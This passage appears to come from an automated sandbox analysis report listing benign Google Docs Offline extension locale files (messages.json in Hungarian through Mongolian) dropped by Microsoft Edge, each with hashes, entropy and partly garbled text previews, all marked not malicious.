Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
